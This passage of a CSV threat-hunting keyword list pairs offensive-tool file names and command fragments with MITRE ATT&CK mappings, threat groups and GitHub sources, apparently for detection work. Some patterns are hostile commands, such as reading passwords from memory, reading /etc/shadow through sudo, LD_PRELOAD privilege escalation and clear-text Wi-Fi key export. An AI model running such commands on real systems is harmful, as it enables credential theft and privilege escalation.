APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*steal-cert.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*StealCookie-28050355-D9DF-4CE7-BFBC-4F7DDE890C2A.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*StealPowerAutomateToken-C4E7B7DA-54E4-49AB-B634-FCCD77C65025.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*Sticky-Keys-Slayer*","offensive_tool_keyword","Sticky-Keys-Slayer","Scans for accessibility tools backdoors via RDP","T1078 - T1015 - T1203","TA0003 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/linuz/Sticky-Keys-Slayer","1","1","N/A","N/A","4","319","80","2018-03-16T15:59:41Z","2016-08-06T18:55:28Z" +"*StickyNotesExtract.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*stinger_client -*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","0","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*stinger_client.py*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*stinger_server.exe*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*stopdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*StopInveigh*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-stop-keylogger*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"*stop-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*stormshadow07*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","1","N/A","N/A","9","867","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z" +"*STRING firefox about:logins*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*String netsh wlan export profile key=clear*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*strings -n * /dev/mem | grep -i pass*","greyware_tool_keyword","grep","search for passwords in memory and core dumps","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*strip_bof.ps1*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*strip2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*strip-bof -Path *","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*StrongLoader_x64.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*struts_ext_v2.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*su rootz*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" +"*subbrute*","offensive_tool_keyword","subbrute","SubBrute is a community driven project with the goal of creating the fastest. and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting. This design also provides a layer of anonymity. as SubBrute does not send traffic directly to the targets name servers.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/TheRook/subbrute","1","1","N/A","N/A","10","3151","653","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z" +"*subdomain_takeovers.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*subdomains-100.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-10000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-top1million-110000.txt*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*subdomains-top1million-20000.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*subdomains-uk-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-uk-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomain-wordlist.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*subfinder -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*subfinder -silent -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*subfinder --silent*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*subfinder*","offensive_tool_keyword","subfinder","SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/subfinder/subfinder","1","0","N/A","N/A","10","8302","1128","2023-10-02T15:13:41Z","2018-03-31T09:44:57Z" +"*sublist3r -v -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Sublist3r*","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","10","8700","2020","2023-10-01T21:58:10Z","2015-12-15T00:55:25Z" +"*Suborner.exe*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" +"*Suborner-master.zip*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" +"*Successfully connected* spawning shell?*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*Successfully cracked account password*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*Successfully dumped SAM and SYSTEM*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*sudo apache2 -f /etc/shadow*","greyware_tool_keyword","sudo","access sensitive files by abusing sudo permissions","T1548.001 - T1059.004","TA0004 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*sudo bloodhound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*sudo LD_LIBRARY_PATH=. apache2*","greyware_tool_keyword","sudo","abusing LD_LIBRARY_PATH sudo option to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*sudo LD_PRELOAD=/tmp/preload.so find*","greyware_tool_keyword","sudo","abusinf LD_PREDLOAD option to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*sudo -nS id' && lse_sudo=true*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*sudo rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*sudo tmux new -s icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*sudo_inject*","offensive_tool_keyword","sudo_inject","Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token","T1055 - T1548.001 - T1059.002","TA0002 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nongiach/sudo_inject","1","1","N/A","N/A","7","649","122","2019-04-14T07:43:35Z","2019-03-24T22:06:22Z" +"*SUDO_KILLER*","offensive_tool_keyword","SUDO_KILLER","sudo exploitation #Abusing sudo #Exploiting Sudo #Linux Privilege Escalation #OSCP If you like the tool and for my personal motivation so as to develop other tools please a +1 star The tool can be used by pentesters. system admins. CTF players. students. System Auditors and trolls :).","T1078 - T1059 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/TH3xACE/SUDO_KILLER","1","1","N/A","N/A","10","1977","244","2023-08-02T08:53:48Z","2018-12-07T21:08:02Z" +"*sudomy.git*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*sudopwn.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*SUID3NUM -*","offensive_tool_keyword","SUID3NUM","A standalone python2/3 script which utilizes pythons built-in modules to find SUID bins. separate default bins from custom bins. cross-match those with bins in GTFO Bins repository & auto-exploit those. all with colors! ( ?? ?? ??)","T1168 - 